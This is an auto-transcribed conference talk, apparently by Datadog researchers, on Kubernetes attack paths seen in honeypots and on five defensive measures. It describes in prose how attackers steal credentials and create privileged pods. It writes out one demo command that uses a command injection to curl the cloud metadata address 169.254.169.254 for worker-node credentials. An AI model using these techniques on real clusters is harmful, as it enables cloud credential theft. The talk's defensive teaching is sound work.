 Thanks everyone for coming here. So today we're going to be talking about how to keep hackers out of your clusters with five simple tricks. And obviously it's not going to be five simple tricks. So before we start, I want to pull the room a little bit. Who would identify as someone who's doing mostly security, security, engineering, pentastar, right? More on the SRE DevOps engineer side, system engineer. And more on the application development side, software engineer. Pretty great. Quite a diverse audience. Cool, so thanks for being here today. So the goal and what we're trying to do today is to start from this stage. So you are someone who has to run applications in Kubernetes. And you want to make sure that whenever someone asks you to secure it, you don't feel like this. But you have instead that you can feel confident and you know how to prioritize things and what he said, you can feel like that. My name is Christophe. I'm French as you can hear. I live in Switzerland. And I work at Datadog focusing on cloud security and open source. I'm the maintainer of a few open source projects. One is called the strategy team. Another one is called the managed Kubernetes auditing toolkit. And this is Fred. Hi, I'm Fred. I'm senior security researcher at Datadog, mainly focusing on threat intelligence, malware analysis, and threat activities. Great. So on the agenda, we have mostly three things. The first one is we're going to do a bit of frank modeling of Kubernetes. It sounds like a swear word, but it's going to be fine, don't worry. And then we're going to look at Fred is going to tell us a bit at, OK, the first one is the theoretical side. But then what do we see in the world? What do we see in the real world? How are attackers actually doing things? And finally, based on that, we're going to say, well, these are the things that we're going to implement because they are actually valuable. We are making two assumptions. The first one is that we are using managed Kubernetes running in the cloud, so EKS, AKS, or GKE, just because it's a different level of abstraction. And it allows us to say, for instance, that ITG is going to be secure, and we don't need to care about that. Who's using managed Kubernetes in one of the major clouds? OK, many people. Not everyone, but it will still be relevant if you are using your own on your Raspberry Pi. So, threat modeling. Again, if we want a bad user story to start with, it's just that as someone who defends something, I need to be able to understand what are the attacks, right? Because you cannot secure what you can defend. And I think the best way to do that is to know how to attack it. And it's a few things, so mostly looking at what are the entry points, where are the, I mean, how is your data flowing through this cluster? What are you, where is the network, and things like that. And there are two challenges, I think, is how do you choose the right abstraction level? So if we are using managed Kubernetes, we don't want to look at all the control plane and how to secure that. Things like ECD, Core DNS, because they are handled for us. And also, how do we prioritize the different attacks that we see? So this is, let's say, the standard use case, way simplified, of course. So we have the cloud provider. On top of it, we run worker nodes, typically EC2, things like that. On top of this, we have pods, and we have the Kubernetes API on the left that is managed by the cloud provider. So in terms of traffic flows, we have mostly three things. The management traffic on the left, that is who, I mean, the traffic that goes to the Kubernetes API. On the right, we have the data plane traffic, so this is more traffic that goes to the applications. We have web services, that's the HTTP or JPC traffic. And on the top right, we have the traffic that goes to the container image registry. When you run a pod, it's going to pull the image, I mean, the cubelite is going to run, to pull the image from the registry. How do we attack that? Well, there are a few ways. The first one is to exploit a VINERA VINT in one of the applications. Maybe you are going to exploit Java application that has a VINERA VULT, the log4j version or something like that. And then as the attacker, you are inside the pod, right? So you can do a few things from there. You can try to escape to the host. So typically, this is if you have a vulnerability in the Linux kernel, in the container runtime, or a pod that is dangerously configured. We can also try to steal cloud credentials and we'll see that in a bit, but typically in many cases, you can actually steal credentials from the underlying worker node using the instance metadata service from your cloud. This is applicable to AWS, GCP and Azure. And finally, if the pod had some permissions, if it's running under a service account that has a cluster role or a role bound to it, then you can probably steal the service account token and move to the Kubernetes API. If you are able also to compromise someone like the credentials of an admin that can access the cluster, you can also directly hit the Kubernetes API. And finally, if you are able to poison one of the images that's used in production, well, you can also run some code in the cluster. So that's the minimalistic threat model that we use today. And the goal is really to say, okay, these are in theory what can happen and what do we see in reality? When we say threat model, I think it's also interesting to look at what are the how, what are the techniques that the community thinks exist to attack a cluster. So there is something that's called the Kubernetes threat matrix by Microsoft and it basically tries to split the way that you can attack something into multiple steps. So the first color is initial access, which is how can you initially hack basically a cluster when you have things like persistence, this is how do you backdoor something and privilege escalation, et cetera. And each of the items in this table is one attack that is possible to perform. And the question is therefore, what is theoretical and what is something that we should actually care about? And there's an image that we see here. Something in the Kubernetes threat matrix, for instance, tells you, well, if an attacker is able to create a malicious admission controller, they can backdoor all of your ports and do some malicious things, which is true. But is this something that we should actually care about or is it just something that is more theoretical and that's it. So Fred, you are a researcher. Can you tell us a little bit what you researched and what you found as well? Yes. Thanks. So before deep diving into what we have observed so far, we will just introduce a small concept about threat-informed defense. So the idea here is to know your enemy, so against who you are fighting and defending, in fact. So in order to do that, you have to gather all the different information, which we call the threat intelligence. So you want to know about the different attacker groups, what are their techniques, tactics, and procedures, as shown in the Kubernetes threat matrix, but also the different type of threat activities and of course the new vulnerabilities, which are released mostly every day and all, and then. And once you have a good definition of this information, then you can put in place some security mechanism. So this is basically what Kate would like to do. However, there are some limits as well for threat-informed defense, especially for cloud and containers. So at first, threat intelligence should drive prioritization, but should not be an end goal by itself. And regarding the threat intelligence information, so you have some dedicated feeds, which exist on the internet, but they are not always curated, I would say, but there's also some initiative from the open-source community, and there was also a talk this morning about that, so we mentioned it later in the slide, about building an open-source threat intelligence for Kubernetes as well. And yeah, so this is also a lack of threat intelligence for cloud and containers. So this is the presentation I was just mentioning. So at least you can get all the information directly here. So here are our contributions for the talk. So we did some literature review, reading different security research blog posts, also checking all the non-exploited vulnerabilities in the wild. So for example, you have the CISA, which is an American agencies, which release the different exploitative vulnerabilities seen in the wild in real-world attacks. So this is quite interesting to take into account, but also different research papers. And of course, under reports that you can have pretty, yeah, every year, talking about the different trends that they have observed in the customer telemetry. The second contribution that we have, it's based on our own observation, thanks to our Honepots. Yeah, thanks. So at first, what is a Honepots? So Honepots is a voluntary, vulnerable service that you will expose on the internet to mimic a specific service and to lure attacker and try to get lots of information from what they will do once they have a foothold on your Honepots directly. So we deployed several ones. We have what we call a HoneNet. So it's fully automated with the CICD, infrastructure as code and so on. We have deployed our HoneNet directly in four different regions in AWS. And with all the monitoring needed to be sure that, yeah, we don't get compromised as well. And then we get all the different logs, information, and we created our own Honepots workflow. So on the left, you have the attacker, trying to connect to our fake Kubernetes API server. We grab all the different logs, thanks to the Kubernetes audit logs directly into data logs. And then on the right, we have the threat intelligence platform, which will grab and gather, aggregate all these type of information based on an open source project called Yeti. So your everyday threat intelligence. And then we try to build some sort of campaign. So this is the notion that I mentioned in the paper we discussed earlier with the sticks, formats, and so on. So the idea is to define the campaign based, for example, here on the Docker image, the command we have seen, but we could also take into account the different environment variable and so on. And then we just slack-notice about the new campaigns and we then analyze further the different payload. As you can see here, we have some base 64 payloads and so on, which resolve to more payloads that will be downloaded directly onto your workload. And so for Kubernetes, what we did, we created Quokbot. So it's based on Quok, which is a Kubernetes without a Kubelet. So the idea is just to provide all the functionalities of the Kubernetes API server without the final payload running the pods and so on. And as you can see, we can get lots of different information about what's going on when you expose the voluntary, vulnerable Kubernetes server. Cool, so that's the how. We can tell you a bit about what you found and also we're going to split that into multiple categories. So we're going to split that against, sorry, between what we saw against the control plane. So what Derek tries to hit the Kubernetes API server versus what tries to exploit the workload that happens to be in Kubernetes. So Fred, the first thing that you want to tell us is that when you expose something to the internet, it gets scanned and exploited very fast. Yes, exactly. So once you deploy something directly on the internet, expose directly on the internet, you will be scanned by default from different web services and companies just to map the internet and get information of what is exposed directly. So here you have an example for Kubernetes, our Kubernetes on iPod. So as you can see, we have different probes. So mainly coming from the US, but yeah, from all over the world. So that's one part. Then you can also, yeah, by default scan, be scanned by some specific web services like Senseys, Shodan and so on. So what they are doing, they are just running scanners around, yeah, around all the IPv4 address space, but IPv6 as well to know about the different threats we have at the different exposed service we have on the internet. So on the left, this is the results from our Honepods. So as you can see, you have the user agent based which is named Senseys directly. So they are not just trying to know if you are just exposed open ports, but they are more aggressive and getting more details about your cluster itself. So as you can see the different services, calls, nodes, et cetera. And then in the end on the right, this is the Senseys web service where you just query something that could interest you. So for example, how many Kubernetes pod names we have exposed directly on the internet and yeah, you have directly the results. So basically this is what attackers are also doing for the reconnaissance phases when they want to directly attack your company for example. Then you have also the different, yeah, so. Then you also have the different command line that you will use by default when you are on a Kubernetes cluster to know what's your permission, what's possible to do. So this is one example here. You can see that they are trying to know if they can create pods, create different nodes, services, deployment, and so on. We also have the same thing for the listing. So the idea here is to know what's running here. And finally, you can also have some more attackers trying to get directly all your secrets. So this brings us to the cloud credential. Yeah, so one thing to remember is that we made the assumptions that the cluster runs in the cloud which means that the cluster is only as secure as the cloud. And typically the way that you can use that is when you compromise the cloud identity, so typically an IAM user or things like that, you can access the cluster by design. And we know that IAM user access keys typically are very easy to leak. These are a few examples. And we did some research actually last year and we showed that most of the cloud incidents are caused by some cloud credentials that leak and this happens all the time. This is an example from the various bulletins. It's a security conference and this is a presentation from someone that runs an incident response team. They showed an incident where they had an IAM user compromised. This is the guard duty alert that they had. And then you can see in this piece of cloud trail log, this is the AWS control plain logs that the attacker tries to use the AWS CLI to access the cluster. So that's one thing. The second thing is that once you compromised a pod that runs in the cloud, it's actually super easy most of the time to get some credentials for the underlying worker node. So that's one way. But typically, when you attack a pod and you manage to compromise it, you're going to try three things as an attacker. First one is to hit what is called the instance metadata service. This is what's going to give you some cloud credentials for the worker node. And this is unfortunately working by default for many cases. You can try to look at hard-coded credentials on the file system. Also it happens a lot and look at environment variables. That's the theory, but in practice, this is a simple script that we got. You can see the first line is a list of files that the attacker is trying to target. And they are basically files that look like they could contain AWS credentials. The second and third line in this get AWS info function is the attacker trying to hit the instance metadata service with curl to say, well, give me some security credentials and these are going to give you the credentials for the underlying worker nodes IAM role. Finally, you can see that they are trying to steal these credentials and to send them to basically a backend that they control. And in that case, funny enough, if you just went to this slash PHP here, you could actually find all the credentials that they stole, as you can see here. So we were able to report that to AWS and they just were able to revoke all these keys. I want to touch a bit also on container escape vulnerabilities. So this is really, you manage to hack a pod, you're inside the pod and you can recommend what do you do to escape outside of this pod? If you read the abstract of this presentation, we said we were going to talk about this and how they are used in the wild. And the reality is that there is very little documentation of the container escape being used in the wild, which to me was very surprising. And I think there are a few reasons. The first one, and this is from a paper from a few years ago, but it still remains true, is that there aren't that many container escape vulnerabilities in container gun times. So this is an example for the most popular ones. You have only four critical vulnerabilities, three of them having proof of concept. So the attack surface isn't that wide. And the second reason that these are two pretty well-known red timers that are saying, do I actually need, oh, you don't see it. They are saying, do you actually need to do a container escape if you can do easier things, right? If you can just steal cloud calendars and go after your S3 bucket that have some credit cards, it's much easier. And the second reason being that you first need to have access to a pod for that, so you need a vulnerable application and this is harder these days than it was maybe 10 years ago. That said, if you don't have plans for this weekend, there is the pull-to-own concept, sorry, contest happening in Vancouver. And they explicitly said for the first time, but they will give you $60,000 if you find a container escape in container D or firecracker. So if you don't have plans for the weekend, think about it and we might see some new vulnerabilities that come out of this. So that's something to watch out for. Fred Lex, you want to tell us that attackers are trying to create workloads. So what does this mean? Like trying to create all microservices or something? Yeah, so as if basically fail to directly create or escape from host, what they are basically doing is just creating new workloads. So there's different ways to create the workloads, so with the different final objective. So for once, you can create new workloads just to escalate privileges by creating the privilege pods and just mounting the host file system directly into your pods and get access to everything you want. And so you have some example here about the different execution. So just creating different pods, but also diamond sets directly in the different namespace, so cube system, but also the default as well. And they also like to bring their own images. So these images are all host on Docker Hub. So most of them are not deleted because we reported them as malicious. But yeah, basically they just create their own workload with their own images, with their own tooling directly available inside the workload itself, the image itself. Another thing to know as well is that attackers exploit vulnerable software as well. So this is part of the game. So yeah, thanks. So attackers exploit public-facing vulnerabilities most of the time to get an initial foothold into your containers. So that's part of the data plane. So here you have the top five vulnerabilities exploited in the wild based on 2023 and based on the report of Aqua. But yeah, they also create a new, yeah, they also unroll a compromised host to scan the internet itself. So what they are doing basically, so that's another payload we caught directly in our Honepots, once they have a foothold in your workload they will use the workload itself to scan the internet and try to exploit new hosts and yeah, compromise them as well. And as you can see here, so this one is coming from a remote code exploitation vulnerability in Confluence and they are just using open source project like mass scan, Z grab and so on to just yeah, scanning the internet in some specific IP ranges as well. So as you can see, we covered things to the literature but also our Honepots, different parts of the Microsoft Kubernetes threat matrix but now we would like to know how can we prevent attackers getting a foothold in our Kubernetes cluster. So Christophe, can you please tell us more on this? Yes, so again these are all the attacks that we were able to find either publicly documented either from our Honepots mapped to the Microsoft Kubernetes threat matrix that we showed before. Now this is all good and shiny but what do we do, right? And so my question is first, should we try to secure our control plan? So do we make our Kubernetes API more secure or our data plan? And the answer which is kind of obvious is that you need both because if you secure your Kubernetes API but you run your workloads as admin exposed to the internet with some vulnerabilities, your security looks like this and conversely if you are just securing your workloads but you have your Kubernetes API on the internet without authentication, it's not going to end well either, right? So the first thing, the first advice would be to get the control plan basics right and the good news is that you're in the cloud in a managed Kubernetes server service so you don't need to really manage your cloud control plan. You just need to make sure that authentication is enforced on the API server which is the default and it's actually very hard to disable that which is good. One advice is to minimize the network exposure of the API server. So your API server will make sure that if you can, you can either put it on a private network, either add some IP or listing on that. On GCP you have something called the identity aware proxy which makes this quite easy. On AWS, most likely you're going to need to put that on an internal network or to use a bastion host or to use IP allow listing. I think one also piece of advice is use as little Kubernetes as you need. So obviously if we don't need Kubernetes, we don't use it but many times we actually don't even need to manage the nodes in which case using something like GKE autopilot or AWS EKS on Fargate is great because you have no control over the nodes so you don't have to patch the nodes and you are protected against various vulnerabilities and things that are quite bad. So that's good. And otherwise if you need the full power of Kubernetes and to manage the nodes, manage Kubernetes is a good option. And obviously if you have a full engineering team which can manage your control plane, that's one option maybe. The second piece of advice is to make sure that you can block the cloud metadata service from the pods. So you have pods and the pods have different ways of accessing cloud credentials but they shouldn't be able to use the instance metadata service. Typically the way that this is attacked is you have an attacker that compromises the pod and from this pod they steal cloud credentials that belong to the instance whole that they run on. As a very quick demo is going to go fast and I know it is 5 p.m. but on the left, I have an application that's been able to command injection and you see on the left an attacker that's going to compromise it. On the right going to run some malicious commands and they are doing curl on the instance metadata service and getting back some credentials that belong to the underlying work mode. Once more time, I'm running a malicious command in this vulnerable application. I do curl 169.254.169.254 and I can basically get some credentials for the instance. And from there I can do various batch things. If you're interested, last year I gave a presentation with Diego Gomez from source graph about specifically visa trajectors. So how you can do different kinds of batch stuff in a managed communities environment. So if you want to check it out, the slides will be online of course. But what you need to do, so two things. If you are using GKE, you need to enable workload identity which is enabled by default on GKE autopilot. And on AWS or Azure, you need to explicitly block the access with a network policy. That's the observation. Now, again, we're in the cloud. It's a normal thing for workloads to access the cloud. And typically there are secure ways to do that. Like EKS pod identity on AWS or IAM roles for service accounts. So these are secure mechanisms for which your Java, your Go application can get some access to your cloud environment. But I think it's super important to be aware of what kind of access they have and to know if you have thousands of pods, which ones can basically be used to go after your cloud. So one way to do that is an open source project that we released last year which is called the Manage Kubernetes Auditing Toolkit MCAT which looks at your Kubernetes service accounts. It looks at your AWS roles and it's going to generate something like this which shows you have this pod in this namespace that can take this IAM role. Again, by design, but it's good to be aware of that and you might get some surprises as well. The fourth piece of advice is just to be intentional about what can run in the cluster. So if you sit with your team, with your SRA team, probably they will tell you things like, oh, we don't run some images from the Docker Hub because we get some rates, limits and things like that. Which is good for security as well. What's important is to try to be able to codify that and to be able to either block, even get some alerts when a workload that you don't want in your cluster tries to get creative. So these are things like, previous pods or pods that mount the whole system. Probably you don't want to have a pod that can mount the root file system of the host ECMP folder. So first step is to try to do some other things. Second one to block it. A few ways to do that. So there is open policy agent gatekeeper. You have Kaiverno, there are two kinds of admission controller and you have a relatively new feature in Kubernetes which is called pole security admission, which allows you to do some of that, including since recently with some custom rules that you can write as, think as custom resource definitions. The presentation I have below here is from a colleague, a next colleague to me, McCormick. He showed how a data dog in the compute security team, they were able to use OPA gatekeeper for this. And the fifth piece of advice is that, it's actually very boring, but application security matters. Like many of it, much of the time, the way an attacker is going to get into your cluster is for an application. So all the standard piece of advice applies. This is a great talk from King Gibbler, he writes the TLDR site newsletter. So things like, use a framework, don't try to reinvent session management, things like that, and try to be aware that if you use Java 8, it's probably going to update, but also to look at the libraries, the dependencies. If you are using a supported version of a framework, things like that, tend to align with a good maturity of operations anyway. Now, once you've done all of that, you can try to go to the next level. Personally, I think it's confusing because sometimes someone will tell you that what Fred is going to show, is going to make you happy, and I don't think that's true. So, you know, these are the basics that makes us to cover first, and then you have some more options. Yes, so you're right. At first, you need to cover the five simple tricks, and then you can go to the next level. So, the first one would be, for example, to harden your workload. So, you have different ways to do it. So, the first one would be, for example, to very carefully choose the image you would like to run into your container. So, for example, this is for less stuff, but also just Python images. If you just need to run Python code, why would you install directly Fetch Ubuntu images, for example? So, that's one first way. So, that at least you do not integrate what attackers are usually using once they have the foothold on the container, like Kerl, YGET, APT. They are also doing APT installed directly. So, that's the first step. Then you can also add some security context, so either directly at the pod level, but also at the container, by adding the read-only root file system. So, setting it to true will prevent, for example, the attacker to be able to fetch another payload to execute them and so on, but also to put in place some persistent mechanism. You can also disable all of privilege escalation. So, this will prevent the running process to get higher privilege inside the container. So, they won't be able to do stuff like that, for example. And finally, disable running as root as well. Then, you can also implement runtime threat detection blocking. Oh yes, thanks. So, by using open source project as well, so such as Falco, Tetragon, or Tracy, so they all rely on EBPF to monitor your workload, and then you can be notified as well of what's going on on the different part of your cluster. And finally, you can also proactively identify attack pass directly in your cluster. So, that's another open source project we released a few months ago, which is Q-Bound. The idea behind the project is to, from a container, how can I become cluster admin just by exploiting the different privileges associated to my workloads? And then, the hardcore mode. So, you can also put in place some Aparmore, AC Linux, SecComp profiles as well. And also, for example, take into account the machinature and also provenance. And let's bring us to the conclusion. Yeah, that was a lot. So, to conclude a bit, a few key takeaways. First one is that whenever we try to secure anything, the first thing in my opinion is to try to understand how you can attack it and to do some basic threat modeling. That's really helpful, but knowing what attackers do is great to have to prioritize, but if you only rely on that, you're going to change your security strategy every week. That's not good either. The first thing is that there is not much in terms of threat intelligence for cloud and for containers. So, this is probably going to get better, but it's something to be aware of. And finally, that some security mechanisms are worth it, and some of them are much harder to implement and the value is a bit more questionable. So, that's all for today. This is the QR code that you cannot leave the room without scanning. If you like the presentation, please tell us so. If you didn't, please tell us so. And if you love the TLGRSec newsletter, there will be a blog post version of this presentation tomorrow, so if you prefer to read it or to transfer it, this is a good way. Thank you very much.